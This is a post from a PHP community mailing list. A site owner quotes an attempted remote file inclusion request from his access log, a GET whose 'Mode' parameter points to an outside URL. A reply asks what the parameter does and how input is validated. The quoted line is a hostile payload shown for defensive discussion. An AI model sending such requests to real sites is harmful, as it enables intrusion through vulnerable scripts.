[EMAIL PROTECTED] wrote:
Hello NYPHP,
I found the following attempted hack in the access log on one of my sites:
"GET /index.php?Mode=http://badguyurl.ru/index.html?";
In this case, the hacker didn't gain access to the site because a
database script failed instead.
I would like to be more proactive with trapping this and sending the
results of the trap back to me so I can track and ban IP addresses
etc.
I have a procedure that I hacked for previous exploits but am
interested now in other options that I may not have used previously.
So what exactly does the parameter Mode do? Isn't this line showing that a
parameter with value got passed to a script with GET? In that case, which
input validation / processing do your scripts have?
David
_______________________________________________
New York PHP Community Talk Mailing List
http://lists.nyphp.org/mailman/listinfo/talk
NYPHPCon 2006 Presentations Online
http://www.nyphpcon.com
Show Your Participation in New York PHP
http://www.nyphp.org/show_participation.php
